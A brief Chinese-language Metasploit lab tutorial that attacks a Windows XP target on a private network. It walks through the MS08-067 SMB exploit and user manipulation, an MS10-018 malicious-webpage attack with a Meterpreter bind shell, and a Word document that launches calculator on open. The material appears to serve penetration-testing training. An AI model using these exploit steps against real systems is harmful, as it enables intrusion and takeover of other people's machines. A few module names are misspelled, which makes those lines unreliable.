MSF渗透测试
使用Windows xp作为靶机
(一)、网络服务器攻击渗透
msfconsole进入MSF服务
输入use命令可以使用该漏洞利用模块,列如use exploit/windows/smb/ms08_067_netapi
使用show options命令查看需要设置的参数
里面的LHODST为localhost,代表Kali的IP地址。而且端口是4444
set RHOST 192.168.67.130(搭建的靶场的IP)
run
使用shell命令可以拿到xp的shell
拿到xp的shell后可以使用net user查看用户
也可以添加用户
还可以删除用户
(二)、浏览器攻击渗透
(1)、大概介绍
msf 会生成一个网页 只要点击了这个网页就上线了
会把经过ms10_018的漏洞生成一个网页,只要把这个网页点开了之后控制权就到Kali中
(2)、实战操作
msfconsole
执行use exploit/windows/browser/ms10_018_ie_behaviors命令
设置自己服务器的IP,set SRVHOST 192.168.67.150(kali自己的IP)
设置payload正向连接的shell
set PAYLOAD windows/meteroreter/bind_tcp
为了方便识别,把端口设置为4441或4442,即使不设置也行
set LPORT 4441
exploit -j
Kali会生成一个url,我们只需要让目标主机访问这个url
#等待靶机执行
访问url
访问成功后在Kali中会出现successfully
jobs
sessions -i 1
i 是in的缩写,进入的意思
1表示id号
shell
现在就能执行shell了
(三)、生成word调用计算器的程序
进入msfconsole
use命令使用这个模块
设置一个payload
我们设置只要目标主机访问Word就自动弹出一个计算器
设置这个Word的名字为ceshi
run运行一下
含有.的话表示一个隐藏的文件夹,我们到root目录下找到隐藏的文件夹
在靶机上运行Word文件,发现直接自动调出计算器